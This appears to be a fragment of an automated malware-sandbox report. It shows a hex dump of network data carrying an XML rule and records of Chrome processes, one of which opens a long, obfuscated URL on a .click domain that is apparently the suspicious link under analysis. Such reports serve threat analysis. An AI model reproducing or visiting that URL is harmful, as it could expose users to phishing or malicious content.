                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:44 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120666" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                                                                                                                                                                                                          Target ID:0
                                                                                                                                                                                                                                                                                                                                                                          Start time:05:12:18
                                                                                                                                                                                                                                                                                                                                                                          Start date:14/10/2024
                                                                                                                                                                                                                                                                                                                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                                                                                                                                                                                                                                                                                                                                                                          Imagebase:0x7ff6c4390000
                                                                                                                                                                                                                                                                                                                                                                          File size:3'242'272 bytes
                                                                                                                                                                                                                                                                                                                                                                          MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                                                                                                                                                                                          Target ID:2
                                                                                                                                                                                                                                                                                                                                                                          Start time:05:12:19
                                                                                                                                                                                                                                                                                                                                                                          Start date:14/10/2024
                                                                                                                                                                                                                                                                                                                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2372 --field-trial-handle=2260,i,10608258172845983546,5722045760868179073,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                                                                                                                                                                                                          Imagebase:0x7ff6c4390000
                                                                                                                                                                                                                                                                                                                                                                          File size:3'242'272 bytes
                                                                                                                                                                                                                                                                                                                                                                          MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                                                                                                                                                                                          Target ID:5
                                                                                                                                                                                                                                                                                                                                                                          Start time:05:12:22
                                                                                                                                                                                                                                                                                                                                                                          Start date:14/10/2024
                                                                                                                                                                                                                                                                                                                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://hy.markkasmick.click/cx/tbSgVco_akr35UznLBgMmL_dGwr4A9B_vyg2WwEB0w1LRjKjQMyEnB89mCfTRy8oqnbpdFunqinBhx0TsHvSJdUHnbksc3kdcKecoDvVHa5LAm46at*Mm*Ro3D2CHoEu2bmOqt4Ic8O_7AE7Igwgbi5c8zmZf6Fqp*_XqcjREPr7609oL7vKm8FfjGLhMetr2oxtpR3ywH4BUElgc7EI7usxj8CJYEUMktwlb7YUzPvYQ7P1PilEV0LqiXI5sm6QVF4ZGl5TIXhnQLOG0kl6WQ0miiZysBfhaNojnPTUvisUUkwOp2fYTxkXEIhZ7ESJ7qXYLxQbm*y4RJVeZZZ3RY5rX8W5t8cudSM9Zx7UaxgLH56aOv81v4QfUnzroT9v*7LR3jPEjz*YXr2LwuykYQnzvV6boWl*o*gU4jkPE6MocRRlRoC6uUx2e1Wseo8MqGWTT2uXo4HbQDneiMF84sQ34*3TnbAxXWu8xLbb_mAOQxUTA3T5TUUZKeU3ziolM8TSVV5Y5LQTFGtNArddwJKdWCb_cLYMxUJpZ3cqM_A"
                                                                                                                                                                                                                                                                                                                                                                          Imagebase:0x7ff6c4390000
                                                                                                                                                                                                                                                                                                                                                                          File size:3'242'272 bytes
                                                                                                                                                                                                                                                                                                                                                                          MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                                                                                                                          No disassembly